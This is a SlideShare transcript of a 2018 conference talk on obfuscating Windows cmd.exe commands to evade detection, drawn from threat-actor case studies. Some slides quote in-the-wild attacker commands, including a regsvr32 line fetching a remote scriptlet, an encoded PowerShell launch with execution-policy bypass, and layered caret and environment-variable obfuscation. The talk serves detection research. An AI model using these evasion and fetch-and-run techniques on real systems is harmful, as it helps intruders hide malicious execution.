Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

CONFidence 2018: Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation) - Daniel Bohannon

Skilled attackers continually seek out new attack vectors and effective ways of obfuscating old techniques to evade detection. Active defenders can attest to attackers’ prolific obfuscation of JavaScript, VBScript and PowerShell payloads given the ample availability of obfuscation frameworks and their effectiveness at evading many of today’s defenses. However, advanced defenders are increasingly detecting this obfuscation with help from the data science community. This approach paired with deeper visibility into memory-resident payloads via interfaces like Microsoft’s Antimalware Scan Interface (AMSI) is causing some Red Teamers to shift tradecraft to languages that offer defenders less visibility. But what are attackers using in the wild? In the past year numerous APT and FIN (Financial) threat actors have increasingly introduced obfuscation techniques into their usage of native Windows binaries like wscript.exe, regsvr32.exe and cmd.exe. Some simple approaches entail randomly adding cmd.exe’s caret (^) escape character to command arguments. More interesting techniques like those employed by APT32, FIN7 and FIN8 involve quotes, parentheses and standard input. The most interesting obfuscation technique observed in the wild was FIN7’s use of cmd.exe’s string replacement functionality identified in June 2017. This discovery single-handedly initiated my research into cmd.exe’s surprisingly effective but vastly unexplored obfuscation capabilities. In this presentation I will dive deep into cmd.exe’s multi-faceted obfuscation opportunities beginning with carets, quotes and stdin argument hiding. Next I will extrapolate more complex techniques including FIN7’s string removal/replacement concept and two never-before-seen obfuscation and full encoding techniques – all performed entirely in memory by cmd.exe. Finally, I will outline three approaches for obfuscating binary names from static and dynamic analysis while highlighting lesser-known cmd.exe replacement binaries. I will conclude this talk by giving a live demo of my latest obfuscation framework called Invoke-DOSfuscation that obfuscates cmd.exe payloads using these multi-layered techniques. I will also share detection implications and approaches for this genre of obfuscation.

  • Sé el primero en comentar

CONFidence 2018: Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation) - Daniel Bohannon

  1. 1. Daniel Bohannon @danielhbohannon Senior Applied Security Researcher Mandiant, A FireEye Company COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED. Invoke-DOSfuscation Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation) http://insights.looloo.com/wp-content/uploads/2016/10/Latte-Art-in-Manila-Featured-FB.
  2. 2. • Daniel Bohannon • Title :: Senior Applied Security Researcher • Team :: Advanced Practices Team @ Mandiant/FireEye • Twitter :: @danielhbohannon • Blog :: http://danielbohannon.com • Projects • Invoke-Obfuscation & Invoke-CradleCrafter • Revoke-Obfuscation (w/@Lee_Holmes) • Invoke-DOSfuscation 2 C:> """who""am"i COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  3. 3. • Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers. 3 DISCLAIMER: COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  4. 4. OUTLINE State of the Union Obfuscation Obfuscation in the Wild: 3 Case Studies Whose Binary is it Anyway: Obfuscating Binary Names Deep Dive: Character Insertion Obfuscation Deep(er) Dive: Advanced Payload Obfuscation Invoke-DOSfuscation Demo Detecting DOSfuscation 4 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  5. 5. OUTLINE C:> State of the Union Obfuscation Obfuscation in the Wild: 3 Case Studies Whose Binary is it Anyway: Obfuscating Binary Names Deep Dive: Character Insertion Obfuscation Deep(er) Dive: Advanced Payload Obfuscation Invoke-DOSfuscation Demo Detecting DOSfuscation 5 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  6. 6. • Why Obfuscate? • Evade static (and some dynamic) detections • Increase work for defenders • How Extensive? • Some obfuscation framework exists for almost any scripting language that attackers like to use • Slowing down? • Not any time soon (but I may be biased) 6 State of Obfuscation [Red Team] Not The Droid You're Looking For https://i.imgur.com/lG8bRQe.jpg COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  7. 7. • Additional Host-Based Visibility • AMSI: Antimalware Scan Interface • ETW: Event Tracing (Windows) • Signature-less Detection Approaches • Revoke-Obfuscation (AST-based PowerShell obfuscation detection framework) • Room for improvement? • Absolutely, because attackers are responding by… 7 State of Obfuscation [Blue Team] COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  8. 8. • Choosing softer targets • Disabling defensive visibility • AMSI, ETW, Anti-forensics • Using languages that do not provide good visibility • JavaScript (quieter than PS, but still AMSI) • AMSI visibility if run via Windows Script Host (VBS or JScript) • C# (msbuild.exe all the things) • Custom binaries (b/c whitelisting still uncommon) 8 State of Obfuscation [Attacker Response] http://www.syslog.com/~jwilson/pics-i-like/kurios119.jpg COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  9. 9. • What is this talk? • NOT PowerShell (well, not entirely) 9 State of Obfuscation [My Response] COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  10. 10. • What is this talk? • NOT PowerShell (well, not entirely) • Cmd.exe obfuscation • Cmd.exe visibility • Command line arguments • Parent/child process relationships • Source of action on registry, files, etc. But why an entire framework for cmd.exe obfuscation? 10 State of Obfuscation [My Response] COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  11. 11. OUTLINE State of the Union Obfuscation C:> Obfuscation in the Wild: 3 Case Studies Whose Binary is it Anyway: Obfuscating Binary Names Deep Dive: Character Insertion Obfuscation Deep(er) Dive: Advanced Payload Obfuscation Invoke-DOSfuscation Demo Detecting DOSfuscation 11 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  12. 12. • June 30, 2017 • Co-authored blog post with Nick Carr (@itsreallynick) • Outlines three different obfuscation techniques that MANDIANT consultants identified three threat actors using • Feb 2017 :: FIN8 • Apr 2017 :: APT32 (OceanLotus, Vietnam) • Jun 2017 :: FIN7 (Carbanak) 12 Obfuscation in the Wild COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  13. 13. 13 Case Study #1: FIN8 cmd /c echo %_MICROSOFT_UPDATE_CATALOG% | %_MICROSOFT_UPDATE_SERVICE% $s=$Env:_CT;$o='';$l=$s.length;$i=$Env:_PA%$l;while($o.length -ne$l){$o+=$s[$i];$i=($i+$Env:_KE)%$l}iex($o) powershell - • February 2017 • Process-level environment variables + PowerShell StdIn (launched from macro) COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  14. 14. • April 2017 • Caret and un-paired double quotes in regsvr32.exe arguments • /i:^h^t^t^p (does not show up in regsvr32.exe arguments) • /i:"h"t"t"p (DOES show up in regsvr32.exe arguments – must be even number of quotes) 14 Case Study #2: APT32 (OceanLotus) Host Investigative Platform (HIP) capturing real-time attacker activity during a MANDIANT incident response engagement for APT32 activity COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  15. 15. • June 2017 • DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn • JavaScript encoding & concatenation: • "Wor"+"d.Application" and [String.fromCharCode(101)+'va'+'l'] 15 Case Study #3: FIN7 (Carbanak) COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  16. 16. 16 Case Study #3: FIN7 (Carbanak) https://i.imgur.com/tZpnpiI.gif COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  17. 17. • cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd 17 Case Study #3: FIN7 (Carbanak) COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  18. 18. • cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd 18 Case Study #3: FIN7 (Carbanak) Process-level env var Process-level env var COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  19. 19. • cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd 19 Case Study #3: FIN7 (Carbanak) Garbage delimiter COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  20. 20. • cmd.exe /c set x=wsc@ript /e:jscript … echo %x%|cmd 20 Case Study #3: FIN7 (Carbanak) Garbage delimiter COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  21. 21. • cmd.exe /c set x=wsc@ript /e:js@cript … echo %x%|cmd 21 Case Study #3: FIN7 (Carbanak) Garbage delimiter COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  22. 22. • cmd.exe /c set x=wsc@ript /e:js@cript … echo %x%|cmd 22 Case Study #3: FIN7 (Carbanak) Garbage delimiter Delimiter removal COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  23. 23. • cmd.exe /c set x=wsc@ript /e:js@cript … echo %x %|cmd 23 Case Study #3: FIN7 (Carbanak) Garbage delimiter Delimiter removal COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  24. 24. • cmd.exe /c set x=wsc@ript /e:js@cript … echo %x:@=%|cmd 24 Case Study #3: FIN7 (Carbanak) Garbage delimiter Delimiter removal COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  25. 25. • cmd.exe /c set x=wsc@ript /e:js@cript … echo %x:@=%|cmd 25 Case Study #3: FIN7 (Carbanak) https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  26. 26. 26 Case Study #3: FIN7 (Carbanak) • Timeline • Wed :: June 28, 2017 – Nick Carr (@itsreallynick) finds FIN7 testing payload • Thu :: June 29, 2017 – We write blog post • Fri :: June 30, 2017 – We publish blog post • Sat/Sun :: July 1-2, 2017 – I write and release POC: Out-FINcodedCommand COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  27. 27. 27 Case Study #3: FIN7 (Carbanak) "Is there more here?" • Timeline • Wed :: June 28, 2017 – Nick Carr (@itsreallynick) finds FIN7 testing payload • Thu :: June 29, 2017 – We write blog post • Fri :: June 30, 2017 – We publish blog post • Sat/Sun :: July 1-2, 2017 – I write and release POC: Out-FINcodedCommand COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  28. 28. 28 Implications of This Research • These obfuscation techniques affect: • Dynamic detections • Arguments, parent/child relationship, env var, stdin • Static detections • All of the above + so much more • CFP submissions ☺ https://memegenerator.net/img/images/600x600/2729805/willy-wonka.jpg PLEASE, TELL ME MORE ABOUT YOUR TESTING SO YOU THINK EVENT LOGS DEOBFUSCATE CMD ARGS COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  29. 29. 29 Implications of This Research cmd.exe /c "echo Invoke-DOSfuscation" COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  30. 30. 30 Implications of This Research cmd.exe /c "set O=fuscation&set B=oke- DOS&&set D=echo Inv&&call %D%%B%%O%" COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  31. 31. 31 Implications of This Research cm%windir:~ -4, -3%.e^Xe,;^,/^C",;,S^Et ^ ^o^=fus^cat^ion&,;,^se^T ^ ^ ^B^=o^ke-D^OS&&,;,s^Et^ ^ d^=ec^ho I^nv&&,;,C^Al^l,;,^%^D%^%B%^%o^%" COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  32. 32. 32 Implications of This Research FOR /F "delims=il tokens=+4" %Z IN ('assoc .cdxml') DO %Z ,;^,/^C",;,S^Et ^ ^o^=fus^cat^ion&,;,^se^T ^ ^ ^B^=o^ke- D^OS&&,;,s^Et^ ^ d^=ec^ho I^nv&&,;,C^Al^l,;,^%^D%^%B%^%o%" COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  33. 33. 33 Implications of This Research ^F^oR , , , , , ; ; /^f ; ; ; ; ; , " delims=il tokens= +4 " ; ; ; , , , , %Z ; , , , , ^In , , ; ; , , , ( , ; ; ; ' , , , , , ; ^^a^^S^^s^^oC ; , , , , ; .c^^d^^xm^^l ' ; , , , , ) , , , , ; , ^d^o , , , , , , , %Z , ; ^ ,/^C" , ; , S^Et ^ ^o^=fus^cat^ion& , ; , ^se^T ^ ^ ^B^=o^ke-D^OS&& , ; , s^Et^ ^ d^=ec^ho I^nv&& , ; , C^Al^l , ; , ^ %^D%^%B%^%o%" COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  34. 34. 34 Implications of This Research – HANG ON TIGHT http://photos.motogp.com/2015/07/16/sunday-rider3---ross-noble_0.big.jpg COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  35. 35. 35 Implications of This Research – HANG ON TIGHT AS WE STACK http://photos.motogp.com/2015/07/16/sunday-rider3---ross-noble_0.big.jpg https://www.thesun.co.uk/wp-content/uploads/2016/04/1802881.main_image.jpg COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  36. 36. OUTLINE State of the Union Obfuscation Obfuscation in the Wild: 3 Case Studies C:> Whose Binary is it Anyway: Obfuscating Binary Names Deep Dive: Character Insertion Obfuscation Deep(er) Dive: Advanced Payload Obfuscation Invoke-DOSfuscation Demo Detecting DOSfuscation 36 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  37. 37. • Rename/copy cmd.exe • Cmd.exe substitutes (kind of) • forfiles.exe (@vector_sec) • pcalua.exe • scriptrunner.exe (@KyleHanslovan -- Win10+) 37 Whose Binary is it Anyway: Obfuscating Binary Names COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  38. 38. • Rename/copy cmd.exe • Cmd.exe substitutes (kind of) • forfiles.exe (@vector_sec) • pcalua.exe • scriptrunner.exe (@KyleHanslovan -- Win10+) • https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2 • Syntactical obfuscation of legitimate binary name? 38 Whose Binary is it Anyway: Obfuscating Binary Names COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  39. 39. • Env var encoding • Nothing new • Resolves on command line 39 Whose Binary is it Anyway: Obfuscating Binary Names C:> %ProgramData:~0,1%%ProgramData:~9,2% CmD C:> %ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% Powershell C:> echo %ProgramData% C:ProgramData C:> echo %ProgramData:~0,1%%ProgramData:~9,2% CmD COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  40. 40. • Something that does NOT resolve on the command line (i.e. internal commands) • SET • ASSOC • FTYPE 40 Whose Binary is it Anyway: Obfuscating Binary Names COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  41. 41. • Using SET to produce the string PowerShell 41 Whose Binary is it Anyway: Obfuscating Binary Names COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  42. 42. • Using SET to produce the string PowerShell 42 Whose Binary is it Anyway: Obfuscating Binary Names PSModulePath=C:Program FilesWindowsPowerShellModules;C:Windowssystem32WindowsPowerShellv1.0Modules Required (case-sensitive) delimiters are: s and COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  43. 43. • Using SET to produce the string PowerShell 43 Whose Binary is it Anyway: Obfuscating Binary Names PSModulePath=C:Program FilesWindowsPowerShellModules;C:Windowssystem32WindowsPowerShellv1.0Modules 1 2 3 4 5 6 7 8 9 10 11 12 13 Required (case-sensitive) delimiters are: s and COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  44. 44. • Using SET to produce the string PowerShell 44 Whose Binary is it Anyway: Obfuscating Binary Names PSModulePath=C:Program FilesWindowsPowerShellModules;C:Windowssystem32WindowsPowerShellv1.0Modules 1 2 3 4 5 6 7 8 9 10 11 12 13 cmd.exe /c "FOR /F "delims=s tokens=4" %a IN ('set^|findstr PSM')DO %a" Required (case-sensitive) delimiters are: s and COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  45. 45. OUTLINE State of the Union Obfuscation Obfuscation in the Wild: 3 Case Studies Whose Binary is it Anyway: Obfuscating Binary Names C:> Deep Dive: Character Insertion Obfuscation Deep(er) Dive: Advanced Payload Obfuscation Invoke-DOSfuscation Demo Detecting DOSfuscation 45 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  46. 46. • Typically more useful for evading static analysis detections rather than dynamic detections • Caret escape character (^) • Double quotes, evenly balanced ("") • Encapsulating parentheses • Leading & trailing special characters • Standard input argument hiding 46 Deep Dive: Character Insertion Obfuscation "C:WINDOWSsystem32cmd.exe" /c P^o^w^e^r^S^h^e^l^l^.^e^x^e^ -NoExit -Exec Bypass -EC IAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHk… regsvr32.exe /s /n /u /i:"h"t"t"p://<REDACTED>.jpg scrobj.dll ,cmd;/ccalc cmd /c echo calc|cmd COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  47. 47. • Typically more useful for evading static analysis detections rather than dynamic detections • Nonexistent env vars (batch files) • https://marcin-chwedczuk.github.io/obfuscating-windows-batch-files • Custom env vars • Existing env vars 47 Deep Dive: Character Insertion Obfuscation ......WINDOWSsystem32cmd.exe /V /K set p=p&&!p!owershell -w hidden -c "IEX ((('Q0zF='+'Q0z'+'env:T'+'emp+'+'zARYUEyjv'… echo "Find Evil!" → ec%a%ho "Fi%b%nd Ev%c%il!" C:> echo %ProgramData% C:ProgramData C:> echo %ProgramData:~0,1%%ProgramData:~9,2% CmD COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  48. 48. 48 Deep Dive: Character Insertion Obfuscation • Out-FINcodedCommand POC • A few binary syntax options with environment variable character substitution COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  49. 49. 49 Deep Dive: Character Insertion Obfuscation • Out-FINcodedCommand POC • A few binary syntax options with environment variable character substitution COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  50. 50. %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% decodes to set • Env var encoding in the wild • SHA-256: 661877d416f34411fad7e22246ee0d61d14de3065a34b0a7b2f28052d56db6e2 50 Deep Dive: Character Insertion Obfuscation (ITW 1/3) COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  51. 51. • Env var encoding in the wild • SHA-256: 9e1df42f00829d16afd97c575f08da45467bbcab92ca5e3d2832a009dddaa8a7 • Obfuscator: https://github.com/guillaC/JSBatchobfuscator 51 Set full alphabet in custom env var DECODED Deep Dive: Character Insertion Obfuscation (ITW 2/3) COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  52. 52. Set env var called ' (single quote) with known env var substrings • Env var encoding in the wild • SHA-256: 761483906b45fad51f3c7ab66b1534dee137e93a52816aa270bc97249acb56d0 (see white paper!) 52 Assemble payload as substrings from newly-set ' env var Deep Dive: Character Insertion Obfuscation (ITW 3/3) COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  53. 53. OUTLINE State of the Union Obfuscation Obfuscation in the Wild: 3 Case Studies Whose Binary is it Anyway: Obfuscating Binary Names Deep Dive: Character Insertion Obfuscation C:> Deep(er) Dive: Advanced Payload Obfuscation Invoke-DOSfuscation Demo Detecting DOSfuscation 53 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  54. 54. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING 54 Deep(er) Dive: Advanced Payload Obfuscation cmd.exe setup portion rest of the command COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  55. 55. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING • %COMSPEC% :: env var for "C:Windowssystem32cmd.exe" • /b :: exits cmd.exe to calling program with specified process exit code • /c :: remainder of command line processed as a command • start :: execute remaining command without waiting for it to finish • /b :: (same as before but for second command) • /min :: start window minimized 55 Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  56. 56. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING • Env var substring • Env var substitution 56 Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  57. 57. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING • Env var substring • Env var substitution 57 Deep(er) Dive: Advanced Payload Obfuscation 27 chars COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  58. 58. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING • Env var substring • Env var substitution 58 • %COMSPEC:~0% • %COMSPEC:~0,27% • %COMSPEC:~-27% • %COMSPEC:~-27,27% Deep(er) Dive: Advanced Payload Obfuscation 27 chars COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  59. 59. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING • Env var substring • Env var substitution 59 • %COMSPEC:~0,1337% • %COMSPEC:~-1337% • %COMSPEC:~-1337,1337% • %COMSPEC:~0% • %COMSPEC:~0,27% • %COMSPEC:~-27% • %COMSPEC:~-27,27% 27 chars Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  60. 60. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING • Env var substring • Env var substitution 60 • %COMSPEC:=/% • %COMSPEC:KeepMatt=Happy% • %COMSPEC:*System32=% • %COMSPEC:*Tea=Coffee% • %COMSPEC:~0% • %COMSPEC:~0,27% • %COMSPEC:~-27% • %COMSPEC:~-27,27% • %COMSPEC:~0,1337% • %COMSPEC:~-1337% • %COMSPEC:~-1337,1337% Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  61. 61. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING • Env var substring • %COMSPEC:~0,27% • Env var substitution • %COMSPEC:=/% 61 • %COMSPEC:=/% • %COMSPEC:KeepMatt=Happy% • %COMSPEC:*System32=% • %COMSPEC:*Tea=Coffee% • %COMSPEC:~0% • %COMSPEC:~0,27% • %COMSPEC:~-27% • %COMSPEC:~-27,27% • %COMSPEC:~0,1337% • %COMSPEC:~-1337% • %COMSPEC:~-1337,1337% Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  62. 62. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING • Env var substring • %coMSPec:~0,27% • Env var substitution • %coMSPec:=/% 62 • Random Case Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  63. 63. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING • Env var substring • %coMSPec:~ 0, 27% • Env var substitution • %coMSPec: = / % 63 • Random Case • Whitespace Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  64. 64. • %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING • Env var substring • %coMSPec:~ -0, +27% • Env var substitution • %coMSPec: = / % 64 • Random Case • Whitespace • Explicit signing Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  65. 65. • %coMSPec: = / % /b /c start /b /min netstat -ano | findstr LISTENING • Env var substring • %coMSPec:~ -0, +27% • Env var substitution • %coMSPec: = / % 65 Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  66. 66. • %coMSPec: = / % /b /c start /b /min netstat -ano | findstr LISTENING 66 • Context is crucial • ✔ Cmd.exe • ✔ WScript.Shell • ✘ Service • ✘ Run key • ✘ Scheduled task Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  67. 67. • %coMSPec: = / % /B /c sTArt /b /mIN neTSTat -aNo | fiNDstr LISTENING 67 • Random case Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  68. 68. • %coMSPec: = / %/B/csTArt/b/mIN neTSTat -aNo|fiNDstr LISTENING 68 C:Windowssystem32cmd.exe /B/csTArt/b/mIN neTSTat -aNo NOTE: Single whitespace is added to process arguments. • Random case • Whitespace (-/+) Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  69. 69. • %coMSPec: = / %/B/csTArt/b/mIN neTSTat -aNo|fiNDstr LISTENING 69 Netstat's -ano arg reordering• Random case • Whitespace (-/+) Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  70. 70. • %coMSPec: = / %/B/csTArt/b/mIN neTSTat -Noa|fiNDstr LISTENING 70 Netstat's -ano arg reordering• Random case • Whitespace (-/+) Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  71. 71. • %coMSPec: = / % /B /c sTArt /b /mIN neTSTat -Noa | fiNDstr LISTENING 71 • Random case • Whitespace (-/+) Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  72. 72. • ,;,%coMSPec: = / %,;,/B,;,/c,;,sTArt,;,/b ,;/mIN ,;neTSTat -Noa |,;,fiNDstr LISTENING 72 • Random case • Whitespace (-/+) • Comma & semicolon Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  73. 73. • ,;,%coMSPec:^^^^^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b ^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr LIST^^^ENING 73 Let's look at process execution layers & respective arguments! • Random case • Whitespace (-/+) • Comma & semicolon • Caret Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  74. 74. • ,;,%coMSPec:^^^^^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b ^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr LIST^^^ENING 74 C:Windowssystem32cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^STat ^^ ^^-N^^oa ^^ |,;,fi^NDstr LIST^ENING C:Windowssystem32cmd.exe /S /D /c" sTArt,;,/^b ^ ,;/^mIN^ ,;neT^STat ^ ^-N^oa ^ " neTSTat -Noa fiNDstr LISTENING Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  75. 75. • ,;,%coMSPec:^^^^^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b ^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr LIST^^^ENING 75 C:Windowssystem32cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^STat ^^ ^^-N^^oa ^^ |,;,fi^NDstr LIST^ENING C:Windowssystem32cmd.exe /S /D /c" sTArt,;,/^b ^ ,;/^mIN^ ,;neT^STat ^ ^-N^oa ^ " neTSTat -Noa fiNDstr LISTENING , ; and ^ do NOT persist into final netstat & findstr commands. Is there another obfuscation character? Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  76. 76. • ,;,%coMSPec:^^^^^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b ^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^ST""at ^^^^ ^^^^-N^^^^o""a ^^^^ ^|,;,fi^^^ND""str LIST^^^EN""ING 76 C:Windowssystem32cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^ST""at ^^ ^^-N^^o""a ^^ |,;,fi^ND""str LIST^EN""ING C:Windowssystem32cmd.exe /S /D /c" sTArt,;,/^b ^ ,;/^mIN^ ,;neT^ST""at ^ ^-N^o""a ^ " neTST""at -No""a fiND""str LISTEN""ING YES! Double quotes are widely- accepted obfuscation characters. (, ; and ^ are binary-specific) Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
